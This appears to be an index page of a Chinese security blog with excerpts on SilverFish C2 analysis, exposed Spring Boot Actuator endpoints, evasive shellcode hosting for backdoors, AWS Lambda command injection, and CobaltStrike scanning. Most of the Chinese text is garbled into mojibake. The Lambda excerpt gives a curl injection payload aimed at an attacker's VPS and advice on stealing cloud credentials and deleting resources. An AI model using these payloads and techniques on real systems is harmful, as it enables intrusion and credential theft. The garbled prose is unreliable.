wubba lubba dub dub.
post @ 2021-07-29

SilverFish_TLPWHITE

璧风偣

鏍规嵁FireEye鍙戝竷鐨処OC锛屾湁涓涓煙鍚嶆槸databasegalore.com锛岃繖涓煙鍚嶄笅鐨処P鍦2304绔彛璧蜂簡PowerMTA鏈嶅姟锛寃eb鐩綍鎵弿涔嬪悗鍙戠幇example.php銆侾TI鍥㈤槦鏍规嵁杩欎袱涓綉椤电殑璁惧鎸囩汗鍜孭owerMTA鏈嶅姟锛屾壂鎻忎簡鍏ㄧ綉鐨処Pv4鍦板潃锛屽彂鐜颁竴涓狪P鍦板潃: 81.4.122.203锛岀劧鍚嶱TI鍥㈤槦瀵笽P涓嬬殑C娈佃繘琛屾笚閫忔祴璇曪紝鍙戠幇81.4.122.101瀛樺湪涓涓狢2鏈嶅姟鍣ㄣ

C2鍒嗘瀽

鏀堕泦淇℃伅濡備笅锛

  • ID
  • UUID
  • Instance
  • IP
  • Country
  • Domain\User@Computer
  • OS
  • Build
  • Architecture
  • Antivirus
  • Is Admin
  • Integrity Level
  • UAC Setting
  • ConsentPromptBehaviorAdmin 鈥 PromptOnSecureDesktop
  • First visit

姣忎釜鍙楀鑰呴〉闈㈤兘鍙互鍙戦佹敾鍑绘寚浠わ紝鏈夊涓嬶細

鐪嬩簡涓嬫槸鍛戒护鎵ц鍜孶AC缁曡繃姣旇緝澶氾紝C2鏈嶅姟鍣ㄧ殑闃叉姢鎺柦鏈夊涓嬶細

  • 浣跨敤AppArmor闅旂鐜
  • 鍏抽棴璁块棶鏃ュ織锛坵eb鏃ュ織銆丼SH鐧诲綍鏃ュ織銆佸懡浠よ鏃ュ織锛
  • 浣跨敤IPTABLES鍙厑璁哥櫧鍚嶅崟IP璁块棶
Read More

0x01. 鍩烘湰鐭ヨ瘑

  1. 鍦╬om.xml閲岄潰鏈夎繖鏍风殑閰嶇疆

<dependency>
   <groupId>org.springframework.boot</groupId>
   <artifactId>spring-boot-starter-actuator</artifactId>
   <exclusions>
  1. 娌℃湁寮鍚畨鍏ㄨ缃
management:
  security:
    enabled: false
  health:
    elasticsearch:
      enabled: false
  metrics:
    export:
      prometheus:
        enabled: true
      jmx:
        enabled: true
  endpoints:
    web:
      exposure:
        include: '*'
      base-path: /auto

鏈嶅姟绔彲浠ラ氳繃淇敼閰嶇疆鏂囦欢鏉ユ敼鍙楢ctuator鐨勬牴璺緞锛management.endpoints.web.base-path=/monitor

鎼滅储github鐨勬簮浠g爜锛屽彲浠ョ湅鍒扮被浼肩殑璁剧疆锛

0x02 婕忔礊鍒╃敤

鍦ㄩ厤缃笉褰撶殑鏃跺欙紝鍙兘鏆撮湶浠ヤ笅璺敱:

/actuator
/auditevents
/autoconfig
/beans
/caches
/conditions
/configprops
/docs
/dump
/env
/flyway
/health
/heapdump
/httptrace
/info
/intergrationgraph
/jolokia
/logfile
/loggers
/liquibase
/metrics
/mappings
/prometheus
/refresh
/scheduledtasks
/sessions
/shutdown
/trace
/threaddump
/actuator/auditevents
/actuator/beans
/actuator/health
/actuator/conditions
/actuator/configprops
/actuator/env
/actuator/info
/actuator/loggers
/actuator/heapdump
/actuator/threaddump
/actuator/metrics
/actuator/scheduledtasks
/actuator/httptrace
/actuator/mappings
/actuator/jolokia
/actuator/hystrix.stream
Read More

鑳屾櫙闇姹

涓嶇涓涓粈涔堝舰寮忕殑鍚庨棬锛氬畾鏃朵换鍔°乨ll鍔寔銆佸紑鏈哄惎鍔ㄢ︼紝褰撴垜璁剧疆鐨勫悗闂ㄨ繍琛岀殑鏃跺欙紝鎴戞兂鎺屾彙鍚庨棬鐨勫惎鍔ㄦ椂闂淬佽Е鍙慖P绛変笂鐜锛屾墍浠ヨ繖绡囨枃绔犳槸鍦╯hellcode鍒嗙鍏嶆潃鐨勫熀纭涓婂仛浜嗗皾璇曟ф墿灞

鑰冭檻杩欐牱鐨勫満鏅細

  • 鍚庨棬琚潤鎬佸垎鏋
  • 鍚庨棬琚姩鎬佸垎鏋
  • shellcode琚彁鍙栦箣鍚庤Е鍙

鍦╯hellcode鍒嗙鍏嶆潃鐨勫熀纭涓婃墿灞曡繕鏄瘮杈冨鏄撶殑锛屽綋瀹㈡埛绔姹傝繙绋媠hellcode鎵樼鏈嶅姟鍣ㄧ殑鏃跺欙紝澧炲姞涓涓満鍣ㄤ汉锛岀劧鍚庡彂璧蜂竴涓笂绾块氱煡锛欼f This Then That锛岃繖鏍峰お绠鍗曚簡锛屾垜浠啀澶氬姞鐐规枡锛屾瘮濡傦細

  1. 涓嶅甫鍚堢悊鍙傛暟璇锋眰shellcode鐨刄RL鏃跺欙紝鍙戣捣璀﹀憡
  2. 褰撴湪椹繍琛屽湪鎭舵剰鐜鐨勬椂鍊欙紝鍙戣捣璀﹀憡
    • 褰撴湪椹笂绾縄P涓嶅湪鏈嶅姟绔垪琛
    • 褰撴湪椹笂绾夸富鏈虹殑璁惧鎸囩汗涓嶅湪鏈嶅姟绔垪琛
  3. shellcode鎵樼鏈嶅姟闅忔椂鍙互鍏抽棴鎵撳紑
  4. shellcode鎵樼鏈嶅姟闅忔椂鍙互鏂板鍒犻櫎鏈ㄩ┈涓婄嚎IP鎴栬呰澶囨寚绾

鍑嗗鏉愭枡

  • 涓鍙癡PS锛氭墭绠hellcode锛岄氱煡slack鏈哄櫒浜
  • 涓涓狝WS璐﹀彿闅愯棌C2锛圕loudFront锛
  • Slack锛氭帴鏀堕氱煡锛屼娇鐢Slash commands鍔熻兘鎺у埗shellcode鎵樼鏈嶅姟
鎵樼shellcode娴佺▼

Read More

婕忔礊

娴嬭瘯鐨勬椂鍊欏彂鐜癆WS鐨凩ambda閲岄潰鏈夎繖鏍风殑浠g爜锛屽彲浠ュ緢鏄庢樉鐨勭湅鍑烘潵瀛樺湪鍛戒护娉ㄥ叆锛

execute_command = "ffmpeg -i " + video_url + " -y -f " + img_format + " -ss " + time_index + " -vframes 1 " + WH + " " + output_path
print(execute_command)
cp = subprocess.run(execute_command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)

鏀诲嚮鐨凱ayload锛 ;curl <your vps>:<port>;锛岀劧鍚庡湪鑷繁鏈嶅姟鍣ㄧ洃鍚彲浠ユ敹鍒癓ambda瀹瑰櫒鍙戣捣鐨勮姹傘

淇浠g爜:
cp = subprocess.run(["ffmpeg", "-i", video_url, "-y", "-f", img_format, "-ss", time_index, "-vframes", "1", output_path], stdout=subprocess.PIPE, stderr=subprocess.PIPE)

鍌ㄥ鐭ヨ瘑

  • Lambda鍑芥暟浠g爜璺緞: /var/task
  • 鐢ㄦ埛鍑瘉: 瀛樺偍鍦ㄧ幆澧冨彉閲忛噷闈紝AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, AWS_SESSION_TOKEN
  • 鏂囦欢绯荤粺: /var/task鍙锛/tmp鍙啓
  • 榛樿鐢ㄦ埛: sbx_userxxx
  • Lambda璁$畻鐨勬渶澶ц秴鏃舵椂闂存槸15鍒嗛挓锛屽嚟璇佽繃鏈熸椂闂存槸11涓皬鏃跺乏鍙
  • 鏀诲嚮Lambda鍙渶瑕佽幏鍙朅K銆丼K銆乀oken锛屽弽寮箂hell娌′粈涔堟剰涔

鍦ㄥ瓨鍦ㄥ懡浠ゆ墽琛岀殑鎯呭喌涓嬪厛鑾峰彇鐢ㄦ埛鍑瘉锛岀劧鍚庝娇鐢awscli鍐欏叆鏈湴閰嶇疆鏂囦欢閲岄潰锛岄氳繃awscli鏉ユ搷浣滐紝濡傛灉鍦ㄥ垱寤Lambda鐨勬潈闄愭帶鍒朵笉瓒筹紝杩欎釜鏃跺欏氨鍙互浣跨敤awscli鏉ユ搷浣滃悇绉嶈祫婧愶紝姣斿鎴戝彂鐜扮殑鍛戒护鎵ц鏈夊涓昏处鎴蜂笅鎵鏈夌綉鍗$殑鎿嶄綔鏉冮檺锛屽彲浠ヤ娇鐢ㄨ幏鍙栧埌鐨勭敤鎴峰嚟璇佸垹闄ゆ墍鏈夌綉鍗℃帴鍙c

瀛樺湪鍙﹀涓绉嶆儏鍐碉紝褰撹幏鍙栧埌鐨勫嚟璇佹潈闄愬緢灏忕殑鏃跺欙紝鍒板閮芥槸is not authorized to perform锛屽彲浠ラ氳繃浠ヤ笅鏌ヨ鏉ユ煡鐪嬭嚜宸辩殑鍑瘉閮戒粈涔堟潈闄愶紝棣栧厛閰嶇疆鍛戒护琛屽伐鍏凤細

Read More

鑳屾櫙

鍦╣ithub涓婇潰鍑虹幇涓涓粨搴撳垎鏋CobaltStrike鐩戝惉绔彛鐨勭壒寰侊細https://github.com/Te-k/cobaltstrike銆侰S鍦ㄧ洃鍚琒tager绔彛鐨勬椂鍊欙紝浼氶氳繃URI涓嬭浇Payload鎵ц锛岃繖涓猆RI鐢熸垚鐨勮鍒欑敓鎴愶細

鎵惧埌DomainFront

鏍规嵁360鐨勭┖闂存祴缁橈紝鐪嬪畬涔嬪悗绗竴鏃堕棿鎯冲埌鐨勬槸閫氳繃fofa杩欑被绌洪棿娴嬬粯鎵惧嚭鐗瑰緛锛岀劧鍚庢壘鍑烘潵璁剧疆浜咲omainFront鐨凜2锛屾兂鐪嬬湅杩欎簺C2
鐨勫師濮嬪煙鍚嶅拰璁剧疆C2鐨勫煙鍚嶆槸浠涔堟儏鍐碉紝澶у閮界敤鐨勪粈涔堜綔涓哄煙鍚嶅墠缃殑 :)

Quake娴嬬粯

鏍规嵁360缁欏嚭鐨勬悳绱㈡潯浠讹紝鍏堟壘鍑烘潵涓鎵笽P鍦板潃:

response:"HTTP/1.1 404 Not Found" AND response:"Content-Type: text/plain" AND response:"Content-Length: 0" AND NOT response:"Server: " AND NOT response:"Connection: " AND port: "443"   AND NOT country: "China"

淇敼鑴氭湰

淇敼濂戒箣鍚庣殑鑴氭湰鍜屾壂鎻忕粨鏋:https://github.com/JKme/cobaltstrike銆傛妸鍗曠嚎绋嬫敼涓哄绾跨▼锛屽啀澧炲姞涓涓幏鍙朓P鐨刪ttps璇佷功鍩熷悕鍑芥暟锛

Read More
猬嗭笌TOP